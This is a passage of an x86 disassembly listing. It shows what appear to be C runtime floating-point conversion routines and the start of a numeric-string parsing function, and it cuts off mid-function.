sub ecx, eax
xor eax, eax
rep stosd
loc_411AD1: ; CODE XREF: sub_411969+159�j
cmp [ebp+arg_0], 0
jz short loc_411AD8
inc ebx
loc_411AD8: ; CODE XREF: sub_411969+16C�j
mov eax, ds:dword_424234
mov ecx, eax
sub ecx, ds:dword_424238
cmp ebx, ecx
jge short loc_411AF6
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_411D03
; ---------------------------------------------------------------------------
loc_411AF6: ; CODE XREF: sub_411969+17E�j
cmp ebx, eax
jg loc_411D0D
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_411B24
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411B24: ; CODE XREF: sub_411969+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411B3F: ; CODE XREF: sub_411969+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411B3F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411B79: ; CODE XREF: sub_411969+227�j
cmp edx, eax
jl short loc_411B85
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411B8A
; ---------------------------------------------------------------------------
loc_411B85: ; CODE XREF: sub_411969+212�j
and [ebp+edx*4+var_20], 0
loc_411B8A: ; CODE XREF: sub_411969+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411B79
mov esi, ds:dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_411BB9
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411BB9: ; CODE XREF: sub_411969+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_411C54
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411BE4
; ---------------------------------------------------------------------------
loc_411BDF: ; CODE XREF: sub_411969+281�j
cmp [ebp+eax*4+var_20], 0
loc_411BE4: ; CODE XREF: sub_411969+274�j
jnz short loc_411BEE
inc eax
cmp eax, 3
jl short loc_411BDF
jmp short loc_411C54
; ---------------------------------------------------------------------------
loc_411BEE: ; CODE XREF: sub_411969:loc_411BE4�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411C08
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411C08: ; CODE XREF: sub_411969+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_411C24
cmp edi, edx
jnb short loc_411C2B
loc_411C24: ; CODE XREF: sub_411969+2B5�j
mov [ebp+arg_0], 1
loc_411C2B: ; CODE XREF: sub_411969+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_411C51
; ---------------------------------------------------------------------------
loc_411C32: ; CODE XREF: sub_411969+2E9�j
test ecx, ecx
jz short loc_411C54
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_411C4A
cmp esi, 1
jnb short loc_411C4D
loc_411C4A: ; CODE XREF: sub_411969+2DA�j
xor edi, edi
inc edi
loc_411C4D: ; CODE XREF: sub_411969+2DF�j
mov [ecx], esi
mov ecx, edi
loc_411C51: ; CODE XREF: sub_411969+2C7�j
dec eax
jns short loc_411C32
loc_411C54: ; CODE XREF: sub_411969+263�j
; sub_411969+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411C74
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411C74: ; CODE XREF: sub_411969+2FC�j
mov ecx, ds:dword_42423C
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411C95
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411C95: ; CODE XREF: sub_411969+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411CB0: ; CODE XREF: sub_411969+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411CB0
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411CEA: ; CODE XREF: sub_411969+398�j
cmp edx, eax
jl short loc_411CF6
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411CFB
; ---------------------------------------------------------------------------
loc_411CF6: ; CODE XREF: sub_411969+383�j
and [ebp+edx*4+var_20], 0
loc_411CFB: ; CODE XREF: sub_411969+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411CEA
loc_411D03: ; CODE XREF: sub_411969+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411D0D: ; CODE XREF: sub_411969+18F�j
cmp ebx, ds:dword_424230
mov ecx, ds:dword_42423C
jl loc_411DCC
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411D48
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411D48: ; CODE XREF: sub_411969+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411D63: ; CODE XREF: sub_411969+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411D63
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411D9D: ; CODE XREF: sub_411969+44B�j
cmp edx, eax
jl short loc_411DA9
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411DAE
; ---------------------------------------------------------------------------
loc_411DA9: ; CODE XREF: sub_411969+436�j
and [ebp+edx*4+var_20], 0
loc_411DAE: ; CODE XREF: sub_411969+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411D9D
mov eax, ds:dword_424230
mov ecx, ds:dword_424244
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411DCC: ; CODE XREF: sub_411969+3B0�j
mov eax, ds:dword_424244
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411DF4
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411DF4: ; CODE XREF: sub_411969+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_411E0F: ; CODE XREF: sub_411969+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_411E0F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411E4C: ; CODE XREF: sub_411969+4FA�j
cmp edx, eax
jl short loc_411E58
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411E5D
; ---------------------------------------------------------------------------
loc_411E58: ; CODE XREF: sub_411969+4E5�j
and [ebp+edx*4+var_20], 0
loc_411E5D: ; CODE XREF: sub_411969+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411E4C
xor eax, eax
loc_411E67: ; CODE XREF: sub_411969+39F�j
; sub_411969+45E�j
pop esi
loc_411E68: ; CODE XREF: sub_411969+55�j
; sub_411969+65�j
push 1Fh
pop ecx
sub ecx, ds:dword_42423C
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, ds:dword_424240
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_411E9D
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_411EA7
; ---------------------------------------------------------------------------
loc_411E9D: ; CODE XREF: sub_411969+525�j
cmp ecx, 20h
jnz short loc_411EA7
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_411EA7: ; CODE XREF: sub_411969+532�j
; sub_411969+537�j
pop edi
pop ebx
leave
retn
sub_411969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411EAB proc near ; CODE XREF: sub_411553+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_411F15
xor ebx, ebx
xor eax, eax
loc_411EF2: ; CODE XREF: sub_411EAB+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_411F05
inc eax
cmp eax, 3
jl short loc_411EF2
xor eax, eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F05: ; CODE XREF: sub_411EAB+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F15: ; CODE XREF: sub_411EAB+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, ds:dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411F4D
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411F4D: ; CODE XREF: sub_411EAB+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411FF3
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411F7B
; ---------------------------------------------------------------------------
loc_411F76: ; CODE XREF: sub_411EAB+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411F7B: ; CODE XREF: sub_411EAB+C9�j
jnz short loc_411F85
inc eax
cmp eax, 3
jl short loc_411F76
jmp short loc_411FF3
; ---------------------------------------------------------------------------
loc_411F85: ; CODE XREF: sub_411EAB:loc_411F7B�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411F9F
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411F9F: ; CODE XREF: sub_411EAB+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411FDE
cmp [ebp+arg_0], edx
jmp short loc_411FDC
; ---------------------------------------------------------------------------
loc_411FC1: ; CODE XREF: sub_411EAB+143�j
test ecx, ecx
jz short loc_411FF0
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411FDE
cmp esi, 1
loc_411FDC: ; CODE XREF: sub_411EAB+114�j
jnb short loc_411FE5
loc_411FDE: ; CODE XREF: sub_411EAB+10F�j
; sub_411EAB+12C�j
mov [ebp+var_4], 1
loc_411FE5: ; CODE XREF: sub_411EAB:loc_411FDC�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411FC1
loc_411FF0: ; CODE XREF: sub_411EAB+118�j
mov [ebp+arg_0], ecx
loc_411FF3: ; CODE XREF: sub_411EAB+B5�j
; sub_411EAB+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_412013
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_412013: ; CODE XREF: sub_411EAB+159�j
cmp [ebp+arg_0], 0
jz short loc_41201A
inc ebx
loc_41201A: ; CODE XREF: sub_411EAB+16C�j
mov eax, ds:dword_42424C
mov ecx, eax
sub ecx, ds:dword_424250
cmp ebx, ecx
jge short loc_412038
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_412245
; ---------------------------------------------------------------------------
loc_412038: ; CODE XREF: sub_411EAB+17E�j
cmp ebx, eax
jg loc_41224F
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_412066
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412066: ; CODE XREF: sub_411EAB+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412081: ; CODE XREF: sub_411EAB+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412081
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4120BB: ; CODE XREF: sub_411EAB+227�j
cmp edx, eax
jl short loc_4120C7
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4120CC
; ---------------------------------------------------------------------------
loc_4120C7: ; CODE XREF: sub_411EAB+212�j
and [ebp+edx*4+var_20], 0
loc_4120CC: ; CODE XREF: sub_411EAB+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4120BB
mov esi, ds:dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_4120FB
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4120FB: ; CODE XREF: sub_411EAB+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_412196
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_412126
; ---------------------------------------------------------------------------
loc_412121: ; CODE XREF: sub_411EAB+281�j
cmp [ebp+eax*4+var_20], 0
loc_412126: ; CODE XREF: sub_411EAB+274�j
jnz short loc_412130
inc eax
cmp eax, 3
jl short loc_412121
jmp short loc_412196
; ---------------------------------------------------------------------------
loc_412130: ; CODE XREF: sub_411EAB:loc_412126�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_41214A
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_41214A: ; CODE XREF: sub_411EAB+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_412166
cmp edi, edx
jnb short loc_41216D
loc_412166: ; CODE XREF: sub_411EAB+2B5�j
mov [ebp+arg_0], 1
loc_41216D: ; CODE XREF: sub_411EAB+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_412193
; ---------------------------------------------------------------------------
loc_412174: ; CODE XREF: sub_411EAB+2E9�j
test ecx, ecx
jz short loc_412196
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_41218C
cmp esi, 1
jnb short loc_41218F
loc_41218C: ; CODE XREF: sub_411EAB+2DA�j
xor edi, edi
inc edi
loc_41218F: ; CODE XREF: sub_411EAB+2DF�j
mov [ecx], esi
mov ecx, edi
loc_412193: ; CODE XREF: sub_411EAB+2C7�j
dec eax
jns short loc_412174
loc_412196: ; CODE XREF: sub_411EAB+263�j
; sub_411EAB+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_4121B6
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_4121B6: ; CODE XREF: sub_411EAB+2FC�j
mov ecx, ds:dword_424254
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4121D7
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4121D7: ; CODE XREF: sub_411EAB+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4121F2: ; CODE XREF: sub_411EAB+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4121F2
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41222C: ; CODE XREF: sub_411EAB+398�j
cmp edx, eax
jl short loc_412238
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41223D
; ---------------------------------------------------------------------------
loc_412238: ; CODE XREF: sub_411EAB+383�j
and [ebp+edx*4+var_20], 0
loc_41223D: ; CODE XREF: sub_411EAB+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41222C
loc_412245: ; CODE XREF: sub_411EAB+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41224F: ; CODE XREF: sub_411EAB+18F�j
cmp ebx, ds:dword_424248
mov ecx, ds:dword_424254
jl loc_41230E
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_41228A
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_41228A: ; CODE XREF: sub_411EAB+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4122A5: ; CODE XREF: sub_411EAB+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4122A5
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4122DF: ; CODE XREF: sub_411EAB+44B�j
cmp edx, eax
jl short loc_4122EB
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4122F0
; ---------------------------------------------------------------------------
loc_4122EB: ; CODE XREF: sub_411EAB+436�j
and [ebp+edx*4+var_20], 0
loc_4122F0: ; CODE XREF: sub_411EAB+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4122DF
mov eax, ds:dword_424248
mov ecx, ds:dword_42425C
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41230E: ; CODE XREF: sub_411EAB+3B0�j
mov eax, ds:dword_42425C
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_412336
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412336: ; CODE XREF: sub_411EAB+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_412351: ; CODE XREF: sub_411EAB+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_412351
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41238E: ; CODE XREF: sub_411EAB+4FA�j
cmp edx, eax
jl short loc_41239A
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41239F
; ---------------------------------------------------------------------------
loc_41239A: ; CODE XREF: sub_411EAB+4E5�j
and [ebp+edx*4+var_20], 0
loc_41239F: ; CODE XREF: sub_411EAB+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41238E
xor eax, eax
loc_4123A9: ; CODE XREF: sub_411EAB+39F�j
; sub_411EAB+45E�j
pop esi
loc_4123AA: ; CODE XREF: sub_411EAB+55�j
; sub_411EAB+65�j
push 1Fh
pop ecx
sub ecx, ds:dword_424254
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, ds:dword_424258
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_4123DF
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_4123E9
; ---------------------------------------------------------------------------
loc_4123DF: ; CODE XREF: sub_411EAB+525�j
cmp ecx, 20h
jnz short loc_4123E9
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_4123E9: ; CODE XREF: sub_411EAB+532�j
; sub_411EAB+537�j
pop edi
pop ebx
leave
retn
sub_411EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123ED proc near ; CODE XREF: sub_4114AD+37�p
; sub_411553+37�p
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_46 = dword ptr -46h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_9 = byte ptr -9
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
push esi
xor esi, esi
mov [ebp+var_7C], eax
mov eax, [ebp+arg_4]
inc esi
xor ecx, ecx
cmp [ebp+arg_1C], ebx
push edi
mov [ebp+var_70], eax
lea edi, [ebp+var_20]
mov [ebp+var_74], ebx
mov [ebp+var_68], esi
mov [ebp+var_4C], ebx
mov [ebp+var_58], ebx
mov [ebp+var_5C], ebx
mov [ebp+var_60], ebx
mov [ebp+var_64], ebx
mov [ebp+var_50], ebx
mov [ebp+var_6C], ebx
jnz short loc_412455
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_412A6F
; ---------------------------------------------------------------------------
loc_412455: ; CODE XREF: sub_4123ED+47�j
mov edx, [ebp+arg_8]
mov [ebp+var_54], edx
loc_41245B: ; CODE XREF: sub_4123ED+81�j
mov al, [edx]
cmp al, 20h
jz short loc_41246D
cmp al, 9
jz short loc_41246D
cmp al, 0Ah
jz short loc_41246D
cmp al, 0Dh
jnz short loc_412470
loc_41246D: ; CODE XREF: sub_4123ED+72�j
; sub_4123ED+76�j ...
inc edx
jmp short loc_41245B
; ---------------------------------------------------------------------------
loc_412470: ; CODE XREF: sub_4123ED+7E�j
mov bl, 30h
loc_412472: ; CODE XREF: sub_4123ED+A6�j
; sub_4123ED+BC�j ...
mov al, [edx]
inc edx
cmp ecx, 0Bh ; switch 12 cases
ja loc_4126AD ; default
; jumptable 0041247E case 10
jmp off_412A81[ecx*4] ; switch jump
loc_412485: ; DATA XREF: seg000:off_412A81�o
mov cl, al ; jumptable 0041247E case 0
sub cl, 31h
cmp cl, 8
ja short loc_412495
loc_41248F: ; CODE XREF: sub_4123ED+F7�j
; sub_4123ED+14A�j
push 3
loc_412491: ; CODE XREF: sub_4123ED+201�j
; sub_4123ED+218�j
pop ecx
dec edx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_412495: ; CODE XREF: sub_4123ED+A0�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124AB
loc_4124A6: ; CODE XREF: sub_4123ED+15F�j
push 5
loc_4124A8: ; CODE XREF: sub_4123ED+10C�j
; sub_4123ED+138�j ...
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124AB: ; CODE XREF: sub_4123ED+B7�j
movsx eax, al
sub eax, 2Bh
jz short loc_4124D0
dec eax
dec eax
jz short loc_4124C4
